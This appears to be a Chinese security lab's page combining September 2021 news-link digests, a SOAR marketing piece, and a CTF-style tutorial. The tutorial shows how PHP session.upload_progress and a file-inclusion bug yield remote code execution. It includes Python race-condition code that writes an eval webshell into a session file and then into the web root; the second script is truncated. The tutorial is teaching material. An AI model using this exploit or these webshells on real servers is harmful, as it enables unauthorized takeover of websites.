免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Netgear 智能交换机严重漏洞详情和 PoC 发布 https://thehackernews.com/2021/09/third-critical-bug-affects-netgear.html 2、Travis CI 漏洞暴露了数千个开源项目的重要信息 https://thehackernews.com/2021/09/travis-ci-flaw-exposes-secrets-of.html 3、工信部发布关于加强车联网网络安全和数据安全工作通知 http://www.gov.cn/zhengce/zhengceku/2021-09/16/content_5637709.htm 4、Windows MSHTML 0Day 漏洞被利用部署Cobalt Strike Beacon https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html 5、REvil/Sodinokibi 勒索软件通用解密器已放出 https://threatpost.com/revil-sodinokibi-ransomware-universal-decryptor/169498/ 6、Drupal 更新修复了多个访问绕过、CSRF 漏洞 https://www.securityweek.com/several-access-bypass-csrf-vulnerabilities-patched-drupal 7、FBI、CISA警告称 Zoho 漏洞CVE-2021-40539 被APT广泛利用 https://securityaffairs.co/wordpress/122293/security/cve-2021-40539-zoho-bug-attacks.html 8、Kali Linux 2021.3 发布，新增渗透测试工具和改进 https://www.kali.org/blog/kali-linux-2021-3-release/ 9、旧版IBM System x服务器存在高严重性漏洞且无安全补丁 https://threatpost.com/no-patch-for-ibm-system-x-servers/169491/ 10、SAP发布2021年9月安全更新修补关键漏洞 https://www.securityweek.com/sap-patches-critical-vulnerabilities-september-2021-security-updates

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Microsoft 推出无密码身份验证 https://www.securityweek.com/regular-users-can-now-remove-password-their-microsoft-account 2、微软修补影响Azure用户的OMI软件高危漏洞 https://www.securityweek.com/severe-vulnerabilities-could-expose-thousands-azure-users-attacks 3、Zoom 推出端到端加密电话 https://www.securityweek.com/zoom-introduces-end-end-encrypted-phone-calls 4、西门子、施耐德电气修补 40 多个ICS产品漏洞 https://www.securityweek.com/ics-patch-tuesday-siemens-schneider-electric-address-over-40-vulnerabilities 5、摩托罗拉 Halo+ 婴儿监视器存在远程代码执行漏洞 https://portswigger.net/daily-swig/remote-code-execution-flaw-allowed-hijack-of-motorola-halo-baby-monitors 6、错误配置的 Firebase 数据库导致大量数据泄漏 https://cyware.com/news/misconfigured-firebase-databases-causing-massive-leaks-609ee158 7、Talos团队在 Nitro Pro PDF 中发现代码执行漏洞 https://blog.talosintelligence.com/2021/09/nitro-pro-code-execution.html 8、Adobe发布更新共修复其核心产品的59个漏洞 https://threatpost.com/adobe-bugs-acrobat-experience-manager/169467/ 9、SAP 通过 2021 年 9 月的安全更新修补关键漏洞 https://www.securityweek.com/sap-patches-critical-vulnerabilities-september-2021-security-updates 10、网络犯罪者在钓鱼活动中冒充 USDOT https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、恶意软件 ZLoader 变体通过假TeamViewer 下载广告进行传播 https://thehackernews.com/2021/09/new-stealthier-zloader-variant.html 2、HP OMEN 游戏中心漏洞影响数百万台 Windows https://thehackernews.com/2021/09/hp-omen-gaming-hub-flaw-affects.html 3、微软修补了被积极利用的 Windows 零日漏洞 https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/ 4、研究人员在 PyPI 中发现了逻辑炸弹攻击 https://securityintelligence.com/articles/cryptominers-snuck-logic-bomb-into-python-packages/ 5、谷歌修复了一个被广泛利用的新 Chrome 零日漏洞 https://securityaffairs.co/wordpress/122192/hacking/google-zero-day-10.html 6、超过 6000 万条可穿戴设备、健身追踪记录在线泄露 https://www.zdnet.com/article/over-60-million-records-exposed-in-wearable-fitness-tracking-data-breach-via-unsecured-database/ 7、恶意软件针对墨西哥金融机构窃取用户凭证 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-distributed-in-mexico-uses-covid-19-to-steal-financial-credentials/ 8、APT-C-36的新垃圾邮件活动针对南美实体 https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html 9、MikroTik 确认 Mēris 僵尸网络利用了多年前遭入侵的路由器 https://www.securityweek.com/mikrotik-confirms-m%C4%93ris-botnet-targets-routers-compromised-years-ago 10、研究人员发现一种充气新型光纤可用于量子密钥传输 https://www.zdnet.com/article/quantum-cryptography-this-air-filled-fiber-optic-cable-can-transport-un-hackable-keys-say-researchers/

什么是session.upload_progress？ 与open_basedir、allow_url_fopen、allow_url_include等PHP配置一样，session.upload_progress也是PHP的一个功能，同样可以在php.ini中设置相关属性。其中最重要的几个设置如下： session.upload_progress.enabled = on session.upload_progress.cleanup = on session.upload_progress.prefix = "upload_progress_" session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS" session.upload_progress.enabled可以控制是否开启session.upload_progress功能 session.upload_progress.cleanup可以控制是否在上传之后删除文件内容 session.upload_progress.prefix可以设置上传文件内容的前缀 session.upload_progress.name的值即为session中的键值 session.upload_progress开启之后会有什么效果？ 当我们将session.upload_progress.enabled的值设置为on时，此时我们再往服务器中上传一个文件时，PHP会把该文件的详细信息(如上传时间、上传进度等)存储在session当中。 问题1： 那么这个时候就会有一个前提条件，就是如何初始化session并且把session中的内容写到文件中去呢？ 分析1： 我们可以注意到，php.ini中session.use_strict_mode选项默认是0，在这个情况下，用户可以自己定义自己的sessionid，例如当用户在cookie中设置sessionid=Lxxx时，PHP就会生成一个文件/tmp/sess_Lxxx，此时也就初始化了session，并且会将上传的文件信息写入到文件/tmp/sess_Lxxx中去，具体文件的内容是什么，后面会写到。 问题2： 当session.upload_progress.cleanup的值为on时，即使上传文件，但是上传完成之后文件内容会被清空，这怎么办？ 分析2： 利用Python的多线程，进行条件竞争。 如何利用session.upload_progress进行RCE？ 然而，理论再多也没用，还是得一步步调试，看看在文件上传的时候，整一个PHP服务端到底发生了什么。所以还是需要做实验。 首先，在网站根目录下随便新建一个test.php文件 然后写一个Python程序用于往服务器上上传文件： 这里有几个注意点： 上传的文件大小为50KB，文件名为Lxxx.jpg 该程序设置的sessionid为Lxxx，也就是说会在/tmp目录下生成sess_Lxxx文件 该程序设置的PHP_SESSION_UPLOAD_PROGRESS值为一句话木马，也就是说，在理论上，一句话木马会被写入到/tmp/sess_Lxxx中 import requests import io url = "http://192.168.2.128/test.php" sessid = "Lxxx" def write(session):    filebytes = io.BytesIO(b'a' * 1024 * 50)    while True:        res = session.post(url,            data={                'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST[1]);?>"               },            cookies={                'PHPSESSID': sessid               },            files={                'file': ('Lxxx.jpg', filebytes)               }           ) if __name__ == "__main__":    with requests.session() as session:        write(session) 执行程序后，我们需要用tail -f命令实时查看/tmp/sess_Lxxx文件，因为在本地测试速度比较快，如果使用cat命令，文件内容还没输出就被删除了。 tail -f /tmp/sess_Lxxx 结果如下： 也就是说，/tmp/sess_Lxxx文件中的内容为： upload_progress_<?php eval($_POST[1]);?>|a:5:{s:10:"start_time";i:1631343214;s:14:"content_length";i:276;s:15:"bytes_processed";i:276;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:8:"Lxxx.jpg";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:16 仔细分析一下该文件内容，该文件分为两块，以竖线|区分。 第一块内容如下： upload_progress_<?php eval($_POST[1]);?> 这一块内容由以下两个值组成：session.upload_progress.name+PHP_SESSION_UPLOAD_PROGRESS 第二块内容如下： a:5:{s:10:"start_time";i:1631343214;s:14:"content_length";i:276;s:15:"bytes_processed";i:276;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:8:"Lxxx.jpg";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1631343214;s:15:"bytes_processed";i:276;}}} 一看就是序列化之后的值，我们将其进行反序列化后输出： array(5) { ["start_time"]=>  int(1631343214) ["content_length"]=>  int(276) ["bytes_processed"]=>  int(276) ["done"]=>  bool(false) ["files"]=>  array(1) {   [0]=>    array(7) {     ["field_name"]=>      string(4) "file"     ["name"]=>      string(8) "Lxxx.jpg"     ["tmp_name"]=>      NULL     ["error"]=>      int(0)     ["done"]=>      bool(false)     ["start_time"]=>      int(1631343214)     ["bytes_processed"]=>      int(276)   } } } 可以看到这里记录了文件上传时间、文件大小、文件名称等等文件属性。 接下来在网站根目录新建一个test.php文件，文件内容如下： <?php $a = $_GET["a"]; include($a); 很明显有一个文件包含的漏洞。 接下来我们利用session.upload_progress进行条件竞争 以下代码有几个注意点： 首先，函数write和上面的是一样的，这里就不做过多的赘述了 整个代码的思路就是，往/tmp/sess_Lxxx文件中写入一句话木马，密码为1，然后用题目中的文件包含漏洞，包含这一个文件，在函数read中尝试利用/tmp/sess_Lxxx的一句话往网站根目录文件1.php写一句话木马，密码为2 利用Python的多线程，一边上传文件，一边尝试往根目录中写入1.php，如果成功写入了，就打印输出“成功写入一句话” 这里利用Python的threading模块，开5个线程进行条件竞争 代码如下： import requestsimport ioimport threadingurl = "http://192.168.2.128/test.php"sessid = "Lxxx"def write(session): filebytes = io.BytesIO(b'a' * 1024 * 50) while True: res = session.post(url, data={ 'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST[1]);?>" }, cookies={ 'PHPSESSID': sessid }, files={ 'f 代码执行结果如下： 一开始会一直显示Retry，但是只要运行一段时间就会成功写入一句话。 可以在网站根目录看到，成功写入一句话。 参考资料 Nu1L战队的书籍《从0到1 CTFer成长之路》 P140-141 https://www.freebuf.com/vuls/202819.html 点击链接进行实验：https://www.yijinglab.com/expc.do?ec=ECID39ee-9db2-47bc-9fa1-29150748681b

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员发现面向Linux的CS Beancon -Vermilion Strike https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/ 2、NPM 包：Pac-Resolver 修复高危远程代码执行漏洞 https://thehackernews.com/2021/09/critical-bug-reported-in-npm-package.html 3、Apple 为 NSO 利用的iMessage 零交互0day发布紧急修复程序 https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/ 4、WooCommerce 插件漏洞允许随意改价 https://threatpost.com/woocommerce-multi-currency-bug-pricing/169394/ 5、历经3年， OpenSSL 3.0 发布 https://www.securityweek.com/openssl-30-released-after-3-years-development 6、谷歌警告 Chrome 浏览器中的零日漏洞 https://www.securityweek.com/google-warns-exploited-zero-days-chrome-browser 7、研究人员发现诱骗用户连接恶意 AP 的新方法：SSID Stripping https://www.securityweek.com/ssid-stripping-new-method-tricking-users-connecting-rogue-aps 8、BlackMatter 勒索软件团伙攻击了奥林巴斯 https://securityaffairs.co/wordpress/122140/cyber-crime/blackmatter-ransomware-olympus.html 9、REvil勒索软件团伙再次出现并泄露数据 https://www.bleepingcomputer.com/news/security/revil-ransomware-is-back-in-full-attack-mode-and-leaking-data/ 10、新型银行木马"maxtrilha"针对欧洲和南美银行客户 https://securityaffairs.co/wordpress/122134/malware/maxtrilha-banking-trojan.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、WhatsApp 推出用户聊天记录云端加密备份支持 https://thehackernews.com/2021/09/whatsapp-to-finally-let-users-encrypt.html 2、思科修补 IOS XR 中的高危安全漏洞 https://www.securityweek.com/cisco-patches-high-severity-security-flaws-ios-xr 3、HAProxy 修复了高危 HTTP 请求走私漏洞（ CVE-2021-40346） https://www.haproxy.com/blog/september-2021-duplicate-content-length-header-fixed/ 4、新的 SOVA Android 银行木马正在迅速扩张 https://securityaffairs.co/wordpress/122090/cyber-crime/sova-android-banking-trojan.html 5、微软修复了 Azure 容器实例中的 Azurescape 漏洞 https://securityaffairs.co/wordpress/122081/hacking/microsoft-azurescape-flaw.html 6、专家证实联合国在今年早些时候遭黑客攻击和数据泄露 https://www.infosecurity-magazine.com/news/hackers-steal-data-from-united/ 7、南非国家航天局披露公共FTP服务器数据泄露 https://www.technadu.com/sansa-responds-data-leak-incident-its-nothing-serious/300375/ 8、WordPress发布更新共修复了61个安全漏洞 https://portswigger.net/daily-swig/wordpress-5-8-1-security-release-addresses-clutch-of-vulnerabilities 9、新侧信道攻击可以绕过谷歌Chrome的保护 https://portswigger.net/daily-swig/spook-js-new-side-channel-attack-can-bypass-google-chromes-protections-against-spectre-style-exploits 10、CISA警告称三菱的工业控制器易受远程攻击 https://www.technadu.com/a-widely-deployed-mitsubishi-industrial-controller-is-vulnerable-to-remote-exploitation/300011/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、微软警告 Azure 容器实例中存在信息泄漏漏洞 https://www.securityweek.com/microsoft-warns-information-leak-flaw-azure-container-instances 2、美国政府就零信任架构战略草案征求公众意见 https://www.securityweek.com/us-gov-seeks-public-feedback-draft-federal-zero-trust-strategy 3、 Mēris 僵尸网络针对Yandex发动了大规模DDoS攻击 https://securityaffairs.co/wordpress/122048/malware/meris-botnet-ddos.html 4、TeamTNT 黑客组织扩大其武器库瞄准全球数千个组织 https://securityaffairs.co/wordpress/122037/cyber-crime/teamtnt-expands-arsenal.html 5、研究人员发现全球有超过200万台老旧易受攻击的IIS Web服务器 https://securityaffairs.co/wordpress/122044/security/millions-microsoft-servers-exposed-online.html 6、澳大利亚COVID-19数字疫苗应用中存在漏洞可伪造疫苗证明 https://threatpost.com/spoofing-bug-cybersecurity-vaccine-passports/169287/ 7、NCCoE 发布应急响应人员网络安全指南 https://www.infosecurity-magazine.com/news/nccoe-cybersecurity-guide-first/ 8、Fortinet证实 87,000 台FortiGate设备VPN 帐户密码泄露 https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html 9、特斯拉（TSLA）全自动驾驶测试版软件泄露 https://electrek.co/2021/09/07/tesla-tsla-full-self-driving-beta-software-leaked/ 10、GitHub 在"tar"和"@npmcli/arborist"包中发现 7 个代码执行漏洞 https://www.bleepingcomputer.com/news/security/github-finds-7-code-execution-vulnerabilities-in-tar-and-npm-cli

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Zoho 确认其ADSelfService Plus中的身份验证绕过0day漏洞 https://www.securityweek.com/zoho-confirms-zero-day-authentication-bypass-attacks 2、谷歌发布安全更新修补 40 个Android 漏洞 https://www.securityweek.com/google-android-security-update-patches-40-vulnerabilities 3、霍华德大学遭勒索软件攻击后取消课程和封校 https://www.securityweek.com/howard-university-cancels-classes-shuts-campus-after-ransomware-attack 4、700万以色列人的个人信息在暗网出售 https://securityaffairs.co/wordpress/121984/breaking-news/israelis-data-online.html 5、Groove 团伙泄露了50万个Fortinet 设备凭据列表 https://securityaffairs.co/wordpress/121985/cyber-crime/groove-gang-fortinet-leaks.html 6、微软警告 Internet Explorer 中的0day漏洞被积极利用 https://securityaffairs.co/wordpress/121964/security/microsoft-zero-day.html 7、俄罗斯通信监管机构 Roskomnadzor 封禁了多个VPN https://securityaffairs.co/wordpress/121979/intelligence/russian-roskomnadzor-blocks-vpns.html 8、TeamTNT 的新工具针对多个操作系统 https://threatpost.com/teamtnt-target-multiple-os/169279/ 9、HAProxy 披露严重HTTP 请求走私攻击漏洞 https://thehackernews.com/2021/09/haproxy-found-vulnerable-to-critical.html 10、专家发现针对库尔德族群的移动间谍软件攻击 https://thehackernews.com/2021/09/experts-uncover-mobile-spyware-attacks.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、德国承认警方使用了有争议的 Pegasus 间谍软件 https://www.securityweek.com/germany-admits-police-used-controversial-pegasus-spyware 2、微软发布紧急补丁公告警告MSHTML 中存在远程代码执行漏洞 https://www.securityweek.com/microsoft-office-zero-day-hit-targeted-attacks 3、REvil勒索软件团伙的服务器再次神秘上线 https://securityaffairs.co/wordpress/121952/cyber-crime/revil-ransomware-gang-servers-back-online.html 4、研究人员发布了 Ghostscript 零日漏洞 PoC 漏洞利用代码 https://securityaffairs.co/wordpress/121940/hacking/ghostscript-poc-exploit.html 5、Jenkins 项目的服务器遭攻击者利用Confluence 漏洞入侵 https://securityaffairs.co/wordpress/121934/hacking/jenkins-server-security-breach.html 6、Ragnar Locker团伙称如果受害者联系执法机构将立即泄露数据 https://securityaffairs.co/wordpress/121924/cyber-crime/ragnar-locker-threatens-victims-fbi.html 7、法国政府签证网站遭网络攻击泄露申请人信息 https://portswigger.net/daily-swig/french-government-visa-website-hit-by-cyber-attack-that-exposed-applicants-personal-data 8、爱尔兰警察局查封HSE网络攻击团伙的基础设施 https://www.irishtimes.com/news/crime-and-law/garda%C3%AD-seize-infrastructure-from-hse-cyber-attack-gang-1.4665454 9、数百万摩洛哥公民个人数据在线泄露 https://www.moroccoworldnews.com/2021/09/344304/personal-data-of-2-million-moroccans-leaked-online 10、Barracuda 的报告显示39% 的互联网流量来自不良爬虫 https://www.helpnetsecurity.com/2021/09/07/bad-bots-internet-traffic

由于最近的全球健康危机所造成的“新常态”，如今的安全团队面临着越来越多的挑战。疫情的反反复复，那些在太多工具、太多数据中苦苦挣扎的团队发现，协作和交流变得更加困难，因为他们的员工必须转到虚拟安全运营中心 (SOC) 模型中，同时还要应对越来越多的威胁并投入更多的时间来满足家人和家庭需求。  互不关联的团队加速了对开放、互联平台的安全方法的需求。借助这种方法，组织可以：将新的安全工具与现有安全工具整合在一起，进而实现投资最大化；将SOC 分析人员的工作流转移到单个位置，进而提升他们的生产效率；随着 IT 和安全计划的变化为组织提供灵活性。我们对下一代开放、集成安全平台的愿景围绕下述三个主要原则而构建：  1. 开放架构：如今，组织会使用越来越多的不同工具和云平台，因此下一代安全平台必须具有足够的开放性，才能轻松与来自不同供应商的不同工具进行协同。整合现有工具或移动数据通常由于成本过高、过于复杂而让组织无法实施，但是采用基于开源技术并由开放标准机构支持的平台，便能够让团队以标准化的方式将所有工具整合在一起，进而实现现有投资的最大化。  2. 集中式中心：SOC 分析人员可以使用单个主记录系统来管理其工作流程，进而提升工作效率。在开放架构之上而构建的集中式中心提供了一种融合人员、流程和技术的方式。这使得分析人员可以摆脱他们所用的单个工具，并将其工作简化到单个位置，同时仍可从现有工具中发掘有价值的数据，并减少就所有的已部署工具对整个 SOC 进行训练的需求。目标在于在适当的时间自动将适当的信息呈现到适当的人员面前，让问题得到有效而果断的解决。  3. 灵活部署：大多数组织都使用多个云平台和内部解决方案来管理其安全和IT 环境。此外，每个组织通常都处在自己独特的云之旅中。可在任何位置部署的下一代安全平台能够让企业灵活选择目前和将来的最佳选项，同时避免锁定到特定的部署模型。  SOAR 是下一代安全平台的核心  安全编排、自动化和响应 (SOAR) 解决方案基于 Gartner 定义的四个引擎而构建，分别是：工作流和协作、凭证和案例管理、编排和自动化以及威胁情报管理。结合采用这些功能可以将人员、流程和技术融合在一起，进而提高 SOC 生产效率、缩短事件响应 (IR) 时间。因此，这些引擎也能够为强大的安全堆栈提供理想的基础。的确，基于开放架构并采用灵活混合云部署的 SOAR 功能是构建符合这一愿景的安全平台的理想方法。  将 SOAR 置于安全平台的核心有助于团队以集中、协调的方式开展工作，进而实现整个生态系统以及所有安全流程的价值扩展和最大化。将 SOAR 功能整合到下一代安全平台之中，将能够提供一个坚实的基础，进而帮助组织实现诸多优势。  加强安全团队内部和外部的沟通  任何 SOC，尤其是虚拟 SOC，都需要通过无缝协作来指导响应并组织任务 - 这是 SOAR 平台的关键功能之一。团队无需从头开始，只需要遵循动态运行手册中嵌入的工作流程以智能的方式开展工作即可。此外，安全团队可以利用 SOAR的工作流和协作引擎与不同的职能部门（如 IT、法律、人事或 PR 等）的关键参与者进行沟通，进而促进协调一致且有效的响应。  通过集中式案例管理提升效率  SOC 分析人员可以通过案例管理功能提升效率，此类功能可以通过 SOAR 解决方案的集中式中心进行管理，无需在多个工具和仪表板之间来回切换。在案例管理从 SOAR 解决方案扩展到更广泛的安全平台之后，便可为分析人员提供一种通用格式，以供在所有连接的功能中使用。强大的案例管理功能还包括仪表板和报告功能，用以跟踪指标和 KPI、突出显示趋势和差距并提升 SOC 的业务价值。  生态系统深度和广度的最大化  安全团队可以通过开放架构实现其生态系统深度和广度的最大化。借助开放的、基于标准的方法，SOC 团队可以通过跨各种数据源和工具的集成来利用多样化生态系统的功能，同时充分利用现有投资。这些技术的编排能够扩展 SOAR 功能，同时为安全分析人员提供对生态系统的更高可视性。  将 SOAR 置于下一代平台的核心，有助于让客户将 SOAR 的优势扩展到创建SOAR 所针对的 IR 流程之外，进而将漏洞管理、身份管理、DevSecOps 等安全流程涵盖在内。如此一来，不仅从逻辑上扩展了该项投资，进而产生额外的ROI，而且还能够生成有关这些流程的 KPI，用于推动持续改善并转变安全部门与组织其他部门的关系。